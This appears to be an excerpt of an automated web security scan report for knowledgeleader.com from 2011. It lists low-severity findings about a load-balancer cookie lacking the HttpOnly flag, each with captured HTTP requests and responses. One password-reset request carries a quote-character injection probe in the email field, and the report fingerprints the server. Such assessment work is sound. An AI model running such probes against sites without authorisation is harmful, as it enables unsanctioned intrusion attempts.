6.10. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/dce93ca8c1f384d6862571420036f06c/14d45544af859e4a8825787a00617e85/FreeTrialImage/0.84!OpenElement&FieldElemFormat=jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/dce93ca8c1f384d6862571420036f06c/14d45544af859e4a8825787a00617e85/FreeTrialImage/0.84!OpenElement&FieldElemFormat=jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Content.nsf/dce93ca8c1f384d6862571420036f06c/14d45544af859e4a8825787a00617e85/FreeTrialImage/0.84!OpenElement&FieldElemFormat=jpg HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:34 GMT
Last-Modified: Sat, 23 Apr 2011 03:02:12 GMT
Content-Type: image/jpeg
Content-Length: 35294
ETag: W/"MTAtMDAwMi0wLTg4MjU3ODdCMDAxMEFFMzItMTRENDU1NDRBRjg1OUU0QTg4MjU3ODdBMDA2MTdFODU="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

......JFIF.....H.H.....BExif..II*...........................b...........j...(...........1.......r...2...........i.................
..'....
..'..Adobe Photoshop CS3 Windows.2010:02:12 12:47:29.........
...[SNIP]...

6.11. http://www.knowledgeleader.com/KnowledgeLeader/GlobalStyle.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/GlobalStyle.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/GlobalStyle.css HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:51 GMT
Content-Type: text/css
Content-Length: 11589
Last-Modified: Wed, 06 Apr 2011 23:14:11 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

BODY { background: #FFFFFF; margin: 0px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; }

TABLE { font-size: 12px; }

H1 { font-family: Arial, Helvetica, sans-serif; font-size: 1
...[SNIP]...

6.12. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/2a0e628c2ffba03d88257384007eb0e4/$Body/0.350A!OpenElement&FieldElemFormat=gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/2a0e628c2ffba03d88257384007eb0e4/$Body/0.350A!OpenElement&FieldElemFormat=gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Registration.nsf/2a0e628c2ffba03d88257384007eb0e4/$Body/0.350A!OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:54 GMT
Last-Modified: Thu, 28 Apr 2011 13:39:55 GMT
Content-Type: image/gif
Content-Length: 1987
ETag: W/"MTAtODA4Ny04ODI1Nzg4MDAwMTBDOEZCLTg4MjU3ODVBMDA2MjVGNDEtMkEwRTYyOEMyRkZCQTAzRDg4MjU3Mzg0MDA3RUIwRTQ="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:10 GMT; path=/

GIF89a/./.....................U...mm.!..NETSCAPE2.0.....!.. ....,...././........0.I..8........Hn. ...f...V,.4e.y.....w.
..........S.,....6%.j...w.......k....8e..........cy..|ex....kg....o7.zW|).R.'..t
...[SNIP]...

6.13. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.14. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm
Content-Length: 77
Cache-Control: max-age=0
Origin: http://www.knowledgeleader.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

__Click=0&EMailAddress=%27%40%27.com&CatchCache=True&RedirectTo=%2F&FullName=

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:37 GMT
Content-Type: text/html
Content-Length: 1079
Expires: 0
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:52 GMT; path=/

Content-Type: text/plain
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<head>

<title>Redirecting...</title>

<script language="JavaScript"><!--

f
...[SNIP]...

6.15. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot+Password

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:07 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 13:54:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14832
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Forgo
...[SNIP]...

6.16. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.17. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.18. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.19. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.20. http://www.knowledgeleader.com/KnowledgeLeader/RegistrationCommon.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/RegistrationCommon.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/RegistrationCommon.js HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:52 GMT
Content-Type: application/x-javascript
Content-Length: 5683
Last-Modified: Wed, 30 Sep 2009 23:26:39 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

function Start(page) {
   h=450;
   w=375;
   LeftPosition = (screen.width) ? (screen.width-w)/2 : 0;
   TopPosition = (screen.height) ? (screen.height-h)/2 : 0;
   window.open(page,'CtrlWindow','location=
...[SNIP]...

6.21. http://www.knowledgeleader.com/KnowledgeLeader/RegistrationForms.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/RegistrationForms.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/RegistrationForms.js HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:52 GMT
Content-Type: application/x-javascript
Content-Length: 41633
Last-Modified: Fri, 25 Jun 2010 20:28:59 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

function doDisplayBlock () {

   with (document.forms[0]) {

       // Text-Only Notices and Sections
       if (AccountType[AccountType.selectedIndex].value == 'Trial') {
           if (Form.value.indexOf('Group')
...[SNIP]...

6.22. http://www.knowledgeleader.com/KnowledgeLeader/Resources.nsf/Description/CPE%20BCM%20Link/$FILE/icon_bcm.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Resources.nsf/Description/CPE%20BCM%20Link/$FILE/icon_bcm.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Resources.nsf/Description/CPE%20BCM%20Link/$FILE/icon_bcm.png HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:11 GMT
Last-Modified: Thu, 16 Jul 2009 15:16:44 GMT
Content-Type: image/png
Content-Length: 5924
Accept-Ranges: bytes
ETag: W/"MTAtMDAwMi0wLTg4MjU3NUY1MDA1M0VEOTYtMjQxRTM2NzdDM0I0OUU4Nzg4MjU3NUYzMDA3NDMyNkU="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

.PNG
.
...IHDR...2...,.....'..Z... pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.p.....Or...X......L...,.l...|f.{."..s../.9d............ .&"....|...7.>
...[SNIP]...

6.23. http://www.knowledgeleader.com/KnowledgeLeader/Resources.nsf/Description/CPE%20Cost%20Link/$FILE/icon_cost.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Resources.nsf/Description/CPE%20Cost%20Link/$FILE/icon_cost.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Resources.nsf/Description/CPE%20Cost%20Link/$FILE/icon_cost.png HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:11 GMT
Last-Modified: Thu, 05 Jun 2008 03:03:03 GMT
Content-Type: image/png
Content-Length: 4868
Accept-Ranges: bytes
ETag: W/"MTAtMDAwMi0wLTg4MjU3NDVGMDAxMEMxRjgtOEFCNUI1N0M2NTU4Q0M1Qzg4MjU3NDVFMDA4MzM2NEI="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

.PNG
.
...IHDR...2...,.....'..Z....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yi..gy~......9.....+.$K.|...e...P......$U.R.*...J
..I....\...PP.(...|.2B...>W.{W{...=.=}......dI8.U.Vo
...[SNIP]...

6.24. http://www.knowledgeleader.com/KnowledgeLeader/Resources.nsf/Description/CPE%20Internal%20Audit%20Link/$FILE/icon_audit.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Resources.nsf/Description/CPE%20Internal%20Audit%20Link/$FILE/icon_audit.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Resources.nsf/Description/CPE%20Internal%20Audit%20Link/$FILE/icon_audit.png HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:13 GMT
Last-Modified: Thu, 05 Jun 2008 03:03:03 GMT
Content-Type: image/png
Content-Length: 4191
Accept-Ranges: bytes
ETag: W/"MTAtMDAwMi0wLTg4MjU3NDVGMDAxMEMxRkMtOTRGNjg2ODI5NzU0NUY2RDg4MjU3NDVFMDA4MzM2NEE="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:29 GMT; path=/

.PNG
.
...IHDR...2...,.....'..Z....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yy.].u....}..7...........1..Y.4J..R..Vi.Z.....mJIE...E%MB IPh....l..=./.m......~wx..O.a.....g...;..|.
...[SNIP]...

6.25. http://www.knowledgeleader.com/KnowledgeLeader/Resources.nsf/Description/CPE%20Loss%20Prevention%20Link/$FILE/icon_lp.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Resources.nsf/Description/CPE%20Loss%20Prevention%20Link/$FILE/icon_lp.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Resources.nsf/Description/CPE%20Loss%20Prevention%20Link/$FILE/icon_lp.png HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:12 GMT
Last-Modified: Thu, 16 Apr 2009 19:20:25 GMT
Content-Type: image/png
Content-Length: 5957
Accept-Ranges: bytes
ETag: W/"MTAtMDAwMi0wLTg4MjU3NTlBMDA2QTNEMUEtNDJDNzA5RTRDQURDNDIwNjg4MjU3NTlBMDA2OUU3NkE="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:28 GMT; path=/

.PNG
.
...IHDR...2...,.....'..Z... pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.p.....Or...X......L...,.l...|f.{."..s../.9d...........'..~.1211......
...[SNIP]...

6.26. http://www.knowledgeleader.com/KnowledgeLeader/Resources.nsf/Description/CPE%20SOX%20Link/$FILE/icon_sox.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Resources.nsf/Description/CPE%20SOX%20Link/$FILE/icon_sox.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Resources.nsf/Description/CPE%20SOX%20Link/$FILE/icon_sox.png HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:11 GMT
Last-Modified: Thu, 05 Jun 2008 03:03:03 GMT
Content-Type: image/png
Content-Length: 4040
Accept-Ranges: bytes
ETag: W/"MTAtMDAwMi0wLTg4MjU3NDVGMDAxMEMyMDAtRTdGM0ZGNDdBRjBCRkE1Mjg4MjU3NDVFMDA4MzM2NEM="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

.PNG
.
...IHDR...2...,.....'..Z....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...ZIDATx..Yil\.y=o.}.2\D..)..)Kv..{...n.v..E..u.7(P.m.....G..).....).....u......%..DQ.eY.%R"E.9C...yK...].h\E....
...[SNIP]...

6.27. http://www.knowledgeleader.com/KnowledgeLeader/Resources.nsf/Description/CPE%20Training%20Link/$FILE/icon_training.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Resources.nsf/Description/CPE%20Training%20Link/$FILE/icon_training.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Resources.nsf/Description/CPE%20Training%20Link/$FILE/icon_training.png HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:11 GMT
Last-Modified: Thu, 05 Jun 2008 03:03:03 GMT
Content-Type: image/png
Content-Length: 4500
Accept-Ranges: bytes
ETag: W/"MTAtMDAwMi0wLTg4MjU3NDVGMDAxMEMxRkUtQzRDQTE2MENBNjI1MjQ0MDg4MjU3NDVFMDA4MzM2NEQ="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

.PNG
.
...IHDR...2...,.....'..Z....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...&IDATx..ZipU.y~....i.HHB.6.a.1........bOM.i&u.83.......O......L..=^.....1.......Hh...^.../....R..`.K..|:.=.|.
...[SNIP]...

6.28. http://www.knowledgeleader.com/KnowledgeLeader/Resources.nsf/Description/KLPlusLogo/$FILE/KLPlus_LOGO.JPG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Resources.nsf/Description/KLPlusLogo/$FILE/KLPlus_LOGO.JPG

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Resources.nsf/Description/KLPlusLogo/$FILE/KLPlus_LOGO.JPG HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:11 GMT
Last-Modified: Thu, 17 May 2007 23:56:14 GMT
Content-Type: image/jpeg
Content-Length: 26339
ETag: W/"MTAtMDAwMi0wLTg4MjU3MkRFMDA4MzdEOTUtQjExNEM5M0VENDNEMUUxMDg4MjU3MkREMDA4MTY4RjY="
